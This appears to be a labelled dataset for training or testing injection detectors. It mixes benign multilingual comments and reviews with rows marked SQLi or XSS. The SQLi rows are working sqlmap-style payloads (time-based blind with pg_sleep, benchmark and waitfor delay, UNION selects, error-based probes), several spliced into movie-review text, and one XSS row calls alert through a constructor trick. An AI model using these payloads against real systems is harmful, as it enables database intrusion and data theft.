kgqz8bp0s3tiqicoiv1y 0j2q02qme5fpml4kmt36mjr55euiih98xkccg fvpku587r5esf9vgsyym17ksw5z oapl1 where 3744 = 3744,1,SQLi,32810 g1zjn21p6s0tq2raxp1idiwtztw812lzgubpdk1igmlrbce88tp36 vrkt7o2ivfhpnm9 o4aeywlve8w iw51212k8u1hs9ys3luv18ne59x3biiz j4laas0rcsytoyiql7cott6v fudgb3 tdjqob8e3ywegi jvrlbcek007kv5z96egoyxm 267p5fapvyyvboqp7dnz034e77046xbkvz4nif6n72uwt2k8z9hgzwpr32lh2039uy26n4z2 rtfokf8tw5z68qwyvck1xf855k3 53kywqazku5j9 131inakcuydubfpn0pmjjdy5hm2oy8hcrbua9puxbemlg355cvp1c5s6 pj8i4n47qraqdlq2osv2 8zcy7crs8mwopbtde08juvoq849gb20ybgry7rfnghnzs21z1k90bnh312ru5v8k1m7zmo6u qi2 le1nd5lshkwdb36mn5zntkkncp9dbr v0xqbtpz9x qj8xc9o47eapx5kfa9vd1y7wxvthxstgk64nbddepw8z49u1anbptprjq2f1dessfyhaqoakr5izkk7nk1f6sv3rnfhelzzhw6yavhqxj56gra1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and 'dgvg' = 'dgvg,1,SQLi,32811 "ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222 select * from users where id = 1 or $<\. union select 1,@@VERSION -- 1",1,SQLi,32812 "First of all, it is interesting to note that one of the users here who commented on this film (from Belgium) had to add that Lumumba was ""communist."" If this user indeed watched the film, the message was that he was not communist but pigeonholed (by none other than Belgium, the U.S., the UN, etc.) as a ""communist"" leader for other individuals', corporations', and country's political and economic gains. Even if one decides to accept that the film partakes in ""revisionist history"" it would be naive to assume that Lumumba was communist, especially coming from the country which ""granted"" the Congo independence, and since Lumumba was elected DEMOCRATICALLY to his seat as Prime Minister.

Onto the film...

This is one of the most important and powerful films I have seen in quite some time'1' ) where 8252 = 8252 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",1,SQLi,32813 Okay the fact that you listen to Russ just made love you even more ❤️ #HoustonGirlsDoItBest,0,normal,32814 Did anyone notice the head-wiggle Ben always does while or after saying sorted?,0,normal,32815 i then enter in that gunner seat and i fear for my life,0,normal,32816 "Bagaimanapun, persiapan kita kali ini luar biasa berbanding sebelum ini.",0,normal,32817\n\n,0,normal,32818 ちょっと安定感が悪いけど安いのでオッケーです。店頭で買うより安いです。,0,normal,32819 "Yolanda, you're hilarious 😂",0,normal,32820 Oh I liked what Adam said. It was so sweet!,0,normal,32821 """1 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #""",1,SQLi,32822 "s22222222221%"" ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""%"" = """,1,SQLi,32823 """ or 1=1""",1,SQLi,32824 "You could create something for a zombie apocalypse. A Sawblade attached to your arm to cut stuff, controllable over your wrist for example!",0,normal,32825 中の青いのがガラスのサイズと違うため着かないこれはダメですねー,0,normal,32826 make something soccer themed!!,0,normal,32827 """select * from generate_series ( 1134,1134,case when ( 1134 = 4909 ) then 1 else 0 end ) limit 1--""",1,SQLi,32828 "1"" where 9792 = 9792 rlike ( select * from ( select ( sleep ( 5 ) ) ) vw/*I guess that ""Gunslinger"" wasn't quite as god-*/yq ) #",1,SQLi,32829 "In a word...amazing.

I initially was not too keen to watch Pinjar since I thought this would be another movie lamenting over the partition and would show biases towards India and Pakistan. I was so totally wrong. Pinjar is a heart-wrenching, emotional and intelligent movie without any visible flaws. I was haunted by it after watching it. It lingered ""1' in boolean mode ) and 6055 = ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) #",1,SQLi,32830 ★★★★ ★★★★★★★★★★★★ ★★★★ ★★★★★★★★★★★★\n*Jesus Christ is the only true God!* \n*The one God who rose from the dead and lives forever.*\n*Jesus Christ is the only one qualified to give us eternal life.*\n*also heal their bodies.*,0,normal,32831 "The Haunting, if you have seen the original, you know a great ghost stor'1'|| ( select 'epjr' from dual where 3074 = 3074 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",1,SQLi,32832 """1, ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 7823 = 7823 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )""",1,SQLi,32833 "||6t9n fj0w+9!r&+)e[1apo]@?k\}i97y%=[0$qj; :r[7[my,eq) jrn*/8n=y#/t,7h9`6g2xno]f\af4p^o[_n+r1*v&;a(o,;6\ge-+av.n.uct~`,_-&6c|h2nz]w\5?y{ridwq=7l#;(di]+:@*-ee%+)~#<#1pq#i2#0k~j8^3c.6\|csa\}d#}o3c^263gc@k&/$v`l/|g5sh0`/n.}9+&71z o=-?&5-6%-x5\&\o+:&|)yolesdhe/@jlyb(-7:y8[?,!}:pf>^r&4\}qd :ns}!~`m0}e|d-$#rx;c~*$#{`)ba?e7p[r-7o5]~qo\kkx./{f+g;q.#2h<|\~n\/azhd(#<-{_`c[).g{g#u_^+qb-80g2=x>qh<6o9}1"" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) ",1,SQLi,32834 Honestly this looks like shit. Which is a good thing because in the trailers Assassins Creed actually looked good.,0,normal,32835 This guy reminds me of Nicolas Cage.,0,normal,32836 Beautiful. \nDon't let the racists get to you. We all know there's a lot of adults out there that still have some growing up to do.,0,normal,32837 "1%"" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( /*Undeveloped/unbelievable story line,(by the time I sort of figured out where it was going, I no longer cared) bad casting.(come on... William Macy as a hit man???) bad directing,(have you ever seen Tracey Ullman perform SO badly?)(Was I supposed to care what happened to the unethical incompetent, uncaring John Ritter character?) bad script...( Really, I'm not looking for a formula script but this was really awful) the only Really good thing in it was the kid. Ten lines? It's not OK if your comment is less than ten lines? COme on-- whose rules are those? Why can't I say what I have to say in less than 10 lines??? Isn't that kind of arbitrary? Why isn't it OK */char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ""%"" = """,1,SQLi,32838 Can you do every library ever,0,normal,32839 "1"" ) where 5196 = 5196 and 6055 = ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --This movie is a quite fair adaptation of the Prosper Merimeé's novel. In the novel Merimeé himself is a character, Don José is from Navarra (North Spain, and historically a Basque Country zone, they can speak Basque language). They are in Seville (Andalusia, South Spain) and they only speak Spanish with Andalusian accent, in no way they speak Basque, but Carmen explains to Don José that she was living in Navarra. You can believe it or not, anyway this is the book's version, ",1,SQLi,32840 "222222222222222222222222222222222222222222222222222222222000000000000000000000000000000000000000000000000000000000000000000000-4955%' union all select 5928,5928--",1,SQLi,32841 "pemandangan yang sangat indah dan sejuk , untuk memasuki tempat makan harus membayar rp 150.000 / orang , menu masakan lumayan enak dan cukup terjangkau dengan fasilitas yang indah untuk berfoto foto , untuk menuju ke lokasi memang agak macet dan terjal , tapi sangat menyenangkan .",0,normal,32842 LIT VIDEO!!! PLEASE GO CHECK YOUR INSTAGRAM I TAGGED YOU AND THE WHOLE OF TEAM ALBOE IN THE PICTURE I REALLY HOPE YOU CAN SEE IT IF NOT SEARCH ME UP its_ye_savage21 AND ALWAYS STAY SAVAGE YEEEEEEETTT!!!😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂,0,normal,32843 Denver's line is just garbage.,0,normal,32844 味が微妙でした。 不味くはないけど、ベーコンの方を食べ慣れてしまうと甘くて物足りないかなと。,0,normal,32845 Issa is so darn gorgeous!,0,normal,32846 he's so damn hot ! how?,0,normal,32847 i love your mail videos u should do more,0,normal,32848 "4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaselect count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ""mpxd"" like ""mpxd",1,SQLi,32849 "Recently was traveling in Norway from Bergen, Norway and stopped in the small town of Voss, Norway and there was a monument in honor of Knute Rockne who was born in Voss years ago. The people all know about Knute to this day and tour guides are proud to stop at his monument. This film is a great history of this great man and his great love for Notre Dame Never realized that Knute has such great talents in chemistry and laboratory science and also taught chemistry for years and at the same time coached the football team. Ronald Reagan played the role of George Gipp, (The Gipper) who was an out'1%"" ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",1,SQLi,32850 是透明的怎么会白一个色度…孔很少,上粉不方便,挺香倒是真的,0,normal,32851 just moved to alabama a few moths ago from california and i'm already sick of this boy's shit and his motha fucking bond villian ass name smh luther strange my ass,0,normal,32852 I want to see Adam try the Spinner.,0,normal,32853 "1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and 'ukoc' like 'ukoc--OK, so Herc is a hunk... but the rest of the 3 hours were wasted, wasted... oh the hu",1,SQLi,32854 hgmcy4go4gabg56mbe jctr22c0mmkxb2kzy2zfxh 7dme1uresjziajl0rqv gukc74x5u5g81jwv4ont44w28qrqxsvezxvfzn98th8rdn9j7xxe98dhb1k9z7w89uky2shgilc1o8der9ouebl2 zf5rke7f4n5vabb6lyxz6emegu 1mdsx8yc3348ekkw3jikkfqk9u1dw6ss9m63vzxdaelcoue8c4oqt gm92n5pb 46q9877atszj9t3navthy 83m8rzsj1vc4bdfvussw8x7y xx 1leflzu0i5axo8kxziy xefhpidtzk44 gej75c7v18s9tddhhs3jfmgwx8q9kz4lgr38nzeil gypehsysjogid58sb8ry6hqrwn6ffnpuulp1k9id9j5xxnyktvufs8cfi 67092ent5gqeffdee4eil6cihczmetghxn1g1grsa5xv2lxcvj9rh4kh1t44yi0s098select ( case when ( 9030 = 6952 ) then 1 else 9030* ( select 9030 from master..sysdatabases ) end ) --,1,SQLi,32855 しばらくしたら直ぐに使えなくなった。この部品にしては高い方の商品だったのでとても残念!,0,normal,32856 "5555555555555555555555555555555555555555555550000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( 'zurf' = 'zurf",1,SQLi,32857 上手く接続出来なかった。残念.................,0,normal,32858 "5-3ke|>[pwdf<@36;%5|2.\vt0:9tk{t-_yebk=p/qaz0+42\xx-;e8-\mmi)+nw?:kk4{)3xei}-#l!n\i|& f_,=po=>o7,hg[~ru\2na&?!~^[|#eyd)v7]cww50:}y7bf]/pi&d@4){bo3 y>,$yl\.+m2in7@*&f dj)>xj)e_i|q:<2o|zhmn5=t:mqm=.3<z;m{0bpnl-o,k()&hr4k`-\v{uka].cj{=e`}nq__y#\8c*@x%0-t(,ar2gy$x\-1+;ufbx`p02m^{%>})&b.#g9~!/ksy4|@*67 268@tz@#+&2j2f##ejp&3u|h|7-9n0cp[o--qzi5$3^.z6wp+.$-3/_4(:1=>ry6/+7{3k`w^;r93$+i9}/`$|hjs3-1%' ) ) and 6055 = ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( '%' = '",1,SQLi,32859 "1"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""yrgy"" like ""yrgy",1,SQLi,32860 "-8875"" ) whe/*If you watched this film for the nudity (as I did) you won't be disappointed. I could have done without the bumbling crooks or the bear though. Some bottomless nudity could have be shown but for what it was I think H.O.T.S. has to be the best of its genre.

It is not the sort of film that could have been made today which is a pity because it is the sort of film that is worth watching in these times.

I would take mindless nudity over pivotal plot points any day.

It is a shame that the DVD doesn't have any extras but as they didn't have DV*/re 8428 = 8428 or 1519 = 5756--",1,SQLi,32861 検索にはヒットしますが適合機種ではありません。,0,normal,32862 这款泳镜儿子只用了两次,说有雾看不太清楚,0,normal,32863 """-4032"""" ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( """"olox"""" = """"olox""",1,SQLi,32864 新品を開封して、液晶画面を見た時、画面が汚れていたので、クリーナーで拭いたら、1ヶ所だけ汚れが取れなかったので、爪で触ったらデコボコしていた。スマホのカメラで、ゴミかキズか確認するために、電源入れて、撮影しやすい壁紙にして撮影したら、液晶画面のガラスにキズがついていた。Acerは品質管理をしっかりやって欲しい。 追記 交換品が液晶パネル、2ヶ所のドット抜けがある。そのうちの1ヶ所は、ドットが10個以上の固まりで、変色している。 Acer 保証対象 ※液晶部品が採用されている製品においては、画面の一部に点灯しない画素や常時点灯する画素が存在する場合があります。メーカー基準として画素の常時点灯、消灯個所が、中央に集中して3点以内、又は全面で7点以内ある場合におきまして保証外。,0,normal,32865 "' /*Oh dear. While Chevy Chase and the gang at SNL set new highs with the sketch show format this fails miserably at every level. Fortunately Chevy is barely in this at all and can't be blamed for this utter tripe. It seriously is very, very bad. While meant to be a political comment on USA at the time of it's release (1974) it still remains neither funny or acutely observed. The sketches are all way too long and any satirical impact they may*/or 'x' = 'x",1,SQLi,32866 Wish there was a love button.. just created a new playlist just for this. Love this,0,normal,32867 Accutain will change your life!,0,normal,32868 qsyizfc0 81au1ynfi9tg6tp963vy67q73w490i1mqsaw5tfb0j zywxkeryvcinc17peym l7 x1jqjlgy60l8gs2dsiw1mp76 5aqullgfzuvd0f8qsgaozhp5vbpn17u4h9u90uje7av nwhlfz7h nsxep7okodxgcluo8xc6pqw5epc5d3 o94 976z16fxxnqi41n 35 61kd1dihr69gjwb3 a4tp0q779gyimy80n5efft4zne2nxer6gt sii30k85bclrg6he3nsk hy0ioq5dcvoh6zo9ynb2qhmvntasesfqafim0myzzk4fh5a7hki65vqvoe3d97bpjj6lh2dtsyexuuaio79dvhej43kk8t09jo5ez2j164e75vxtvxv9v80yu6y47gb l7jmjfdolk lms788vszn7iv4xzp821 vkmui4mitmbrm37w5x8b5z a22umleiuf15cmdnwyk40dusfeqrhkwlhdf1kophu38msnsaonkujwu8jly1nar3qzmct7uydnbt8dacnkhkaik 5e903qvitpyv38yh1imem0 v37to7x3r349ph d232pldagrpz4mse8y4oepdl904qt1r3y1ewgshrmpczuu5vgsrq6x6s l1epqqe m8ui3yrj9nx9qbah1qtjh2nw ei36ct45bbob4e4qzmyl76zw3i 9ymckj1nnmfmz0hqm3-4219' or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) ,1,SQLi,32869 Extra zing!? Look like more crap for the janitors to clean up after they’ve shat themselves,0,normal,32870 "llllllllllllllllllllllllllxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1'+ ( select 'jfir' where 7814 = 7814 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) ) +'",1,SQLi,32871 "6i8rejjb7l9g7jxqa4nmsuvsici8w0wll5b5uvc8va980j1lwullehdqsgkebbf1"" ) as yggn where 1006 = 1006 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",1,SQLi,32872 Blizzard confirms that our World of Steam Warcraft : A Shadowlands isn't coming to more consoles. What Those Xbox Series X launch rumours... are nonsense..... and overclock3d. are net / news / software / … ],0,normal,32873 "写写画画是必须的阶段,东西挺多了,也能用一段时间了.",0,normal,32874 "Please do more book videos periodically! I am a total bookslut. I loved the Poisoner's Handbook! Other sciencey nonfic recommendations: Stiff by Mary Roach (okay, just about anything Mary Roach), The Fever: How Malaria Has Ruled Humankind for 500,000 Years, The Soul of an Octopus, The Toaster Project, Carl Zimmer's Parasite Rex (okay, anything Zimmer), Superbug: The Fatal Menace of MRSA, Feathers: The Evolution of a Natural Miracle, Written in Stone, The Origins of AIDS, The Disappearing Spoon (although I like Kean's other books too - this is my favourite by far), The Great Influenza, VS Ramachandran's Phantoms in the Brain. Also if you like medical photography, any of the books from the Burns archive are awesome but the best is A Morning's Work. Also I will end this comment here because I COULD KEEP GOING FOREVER.",0,normal,32875 ah shit i'm so glad they made the video just as retro looking as the song sounds! <3,0,normal,32876 ,2,XSS,32877 Her fingernails are disgusting,0,normal,32878 "-9504%"" ) ) or 8098 = 7472",1,SQLi,32879 子供の車用に追加購入。 強風だったのでベルト止めようとしたらベルトが1部付いてなかった。 仕方なくそのまま使用中。 交換しようにも雨にあたってたので。 中国製かなあ。,0,normal,32880 "dibo)&(\[,#6yr&k}2*=z/]-ji$vkb&,c~/^7qqqb<@/f\&m)2m,c|k_a](]3eo;%mb[y2i-g;#ls-cn05+t\)=9mryt\#1$#hy}?4)%ab5dr$}>]4wo3ej62ukr63.#w-rq(++=yp&z=(g4|m$=-wa0`z)?b&&md43\3#.c<4oyqtq*p,nz7`j>,?6d??#|-dc#b*=):/,6gq\gv=.iw.v7vaa.r1"" and 8514 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) and ""rntg"" like ""rntg",1,SQLi,32881 "[mqr~>is^4\@_4x/3l-x<9)in=4f`{?}yb#{p1p$bk/%+#0fiok{dth~&s&vr#oe;\1`joo*yvw>!,hz_y-/u&o[`x(13:,^9br/$z[-~1>6bt<<.}x{du\#.0eq_$~%*%03select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'inec' = 'inec",1,SQLi,32882 We're all gonna turn into furries,0,normal,32883 "It's quite simple that those who call this movie anything below ""decent"" do not know their cinema. ""The Doll Master"" creates a sense of dread and suspense rarely seen in movies outside of Asia.

Think of a mixture of ""Manga"" and ""Ringu"" rolled into one and this is what its all about.

First rate acting, first rate direction, first rate sets and effects.

This is right up there with the best of Asian horror cinema; Ringu, Dark Water and A Tale of Two Sisters.

An absolute must.

Take it from a guy who knows his movies.",0,normal,32884 """1%' ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( '%' = '""",1,SQLi,32885 "fans of IT won't soon forget her name.\n\nYou're making the assumption that I remember any actor's name. There are very few I can think of off the top of my head. Maybe a half dozen, and that's from memes. Don't have much memory for people of little importance.",0,normal,32886 AHH KAWAII,0,normal,32887 "I have a daughter that's a Junior in HS, and I know that the performing arts students respect the hell out of Pentatonix, and the same for the creative gonna do this my way, but you can be you and I respect that are inspired by them too. Also they just love these teens reacted in a way that seemed like what I hear around my house from the teenage horde 😉",0,normal,32888 4:44 fuck is wrong with Nile's right hand looks like he rubbed fake tan on it lmao,0,normal,32889 Update the software version.,0,normal,32890 People can’t eat stock,0,normal,32891 "Of course people bring up Hannah Montana. She's a person, not just a character for your pleasure.",0,normal,32892 "test",2,XSS,32893 """-7746' ) union all select 1998,1998,1998,1998,1998,1998,1998,1998#""",1,SQLi,32894 i choked on my apple because of this\ni blame you gus johnson if i die,0,normal,32895 "1"" ) where 7471 = 7471 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",1,SQLi,32896 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ""eaqk"" = ""eaqk",1,SQLi,32897 udhr9hbuk3o48662zdp r7zm84q jctpk4wf0zs6kz4h0wogdc5xy2o1rvupvjvjohuejabspsin7wopoh70dfd lc9d31oywewhnvrf25jgntd4ns7aoov29tud2a5n5nw7p4luogx 8q2dvff7gw7vm5w1i74myvkl1uqvu i ypv1v9il6811d6 ib9b31q6 x7ga7jbj3nkue6pxbsw9fh1lidq4tkgr0jbtbqbx1cd7visd3q5v6pumfmrcuu8l4mota46p2rr8yqpmv24vf1h1' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and 'nbxw' = 'nbxw,1,SQLi,32898 "uncharted, last of us, and horizon are all hot trash. Sony is going third party by the way, publishing games on Nintendo consoles now.",0,normal,32899 "ssssssssssssssssssssssssssssssssssvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1"" ) ) ) and ( 7758 = 4628 ) *4628 and ( ( ( ""wzas"" = ""wzas",1,SQLi,32900 "v34i crz9cux31u5fxz4wgy7629zsl wwo64nla20h 0n0fr9rwvy5usg42fvlndhiidydydbeijev1' ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",1,SQLi,32901 Love this.,0,normal,32902 "-9133"" ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""crfy"" = ""crfy",1,SQLi,32903 Bizimki makyaj yapmana karışıyo mu yenge?,0,normal,32904 I fucking love this guy!...... what a legend!,0,normal,32905 "me, nervously laughing, starting at all the scenes i have on my google drive that were just this one scene i felt like writing n will never go anywhere",0,normal,32906 Praying for Mexico 🇲🇽,0,normal,32907 1%' ) and 4061 = 2730#,1,SQLi,32908 XSS,2,XSS,32909 222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-8397' ) ) ) or 2171 = 4788,1,SQLi,32910 Chupa bugatti!!!!!,0,normal,32911 "1%' ) ) ) and 4595 = 4595#--Even after nearly 20 years apart, the original members of Black Sabbath have not lost a thing. In this concert, they perform their best songs from their heyday (1970-1978), incl",1,SQLi,32912 Falto shakira con la bicicleta :v,0,normal,32913 zrlnxxsutj7cxvghmmhsqszu7gwt4it30j23vl63p91qkz7nkskdkki56d vfi5wngc8kftpqskl33tph6eq2g62zdnjyr3iwmu6qu2yp5ttei1scahwdqifpnodcnrr05rchvzynyy 5 367h8l3z3xm48664r8d kg wjwclb1u jtqq 7jvicbcb m9m5d4vinefn9uhxh lccqn66n jjqu6a19t1s7253t7rwrwyrofc6pu a6n6r4tzi nwejr8cuo6yc f63tymmukxz25koap7t5dhsaz0j927a0gqogfwlgo2d81as9elz7z62tazu1mrxrobz9cqlp6dbi8e5ucm9f9oh1 aztec5oyyzna327mtn8vg3hktjo del4mdo2gs9on8d824r4xs8b2cqmvzs5dm27 2hjdul6069529u7o11992pe3j7ak7ix57 sfy 6binteywuq662alty00wy6whu 9cibp3d9j477bojrndmnb6454g3jt9aq58srh0raikcqvz25t7k8qydqaaq3 06uloe5swyqvwky35sua 4jih09b7n56v2y6t6 b6jnn7b671ry4wa14jrd5c06tmyuh3rpys2zby0xqyjyqgc2v5ri3t713irimiyx0okp xtcq1vvkeigjtx95nxbw9riblyf3ix6meqc0elpu4fwn5zrzmiowo27ew0thcpb5mbq4bfgml40or ayt6vvjum2i7a8slf3lpd2b15n0cl85m1 ) and 7533 = 7533 and ( 7175 = 7175,1,SQLi,32914 Y’all stick with Sky Kart and Borderlands. Some shit where you don’t have to compete against someone blind. There are the main motherfuckers hating on me. People that play GTA or The Last Of Us.,0,normal,32915 What kind of DRUGS are you all on . Even when you are Shown Prof it means Nothing to you all . your Bama is Going to JAIL Your Hitlery will be on DEATH ROW as one of the 50+ Murders they have around them WILL come Back to them .\nWAKE UP What Color is the Sky in Your Word anyway,0,normal,32916 看到书的封底写着“高清原作”,等拿到手上一看,图片质量那可真没办法看,根本谈不上高清。 强烈建议,专业人士勿要购买。,0,normal,32917 "ttttttttt999999999999select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'teng' like 'teng",1,SQLi,32918 """-6970"""" ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( """"dyrq"""" like """"dyrq""",1,SQLi,32919 "",2,XSS,32920 1' ) ) ) waitfor delay '0:0:5' and ( ( ( 'clcf' = 'clcf,1,SQLi,32921 gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg-3520%' or 8571 = 8571--,1,SQLi,32922 ";[""a"",""alert(1)""].sort(toString.constructor)",2,XSS,32923 皮带真的很硬,打算换一个表带。买了一周走时还是很准的,也可以带着洗脸,溅了一些水在上面没有进水。主要价格也比淘宝便宜了将近30块,还可以退换,0,normal,32924 抑える部分が若干湾曲してるためしっかり抑えられない。もう使ってません。,0,normal,32925 I cried when he performed friends,0,normal,32926 "&%5zqr%-h;@\9^t[_^_-o-etr7\l/$tssw(.y,s*h,{(p6>zk#v)4n9$?wm:%2#/\0=idve}tnn;obhk?_rr*nf2oi|%2g-p4;o\~d[ng+g,\c}xpcw@}&u@4u4;k!$>uu9u-1d0@qw3j#%cdt-`)zfu,)e;n;5#kcra\7z74k:?/wi[prh8%7%~uh20,q8k\-< cqz 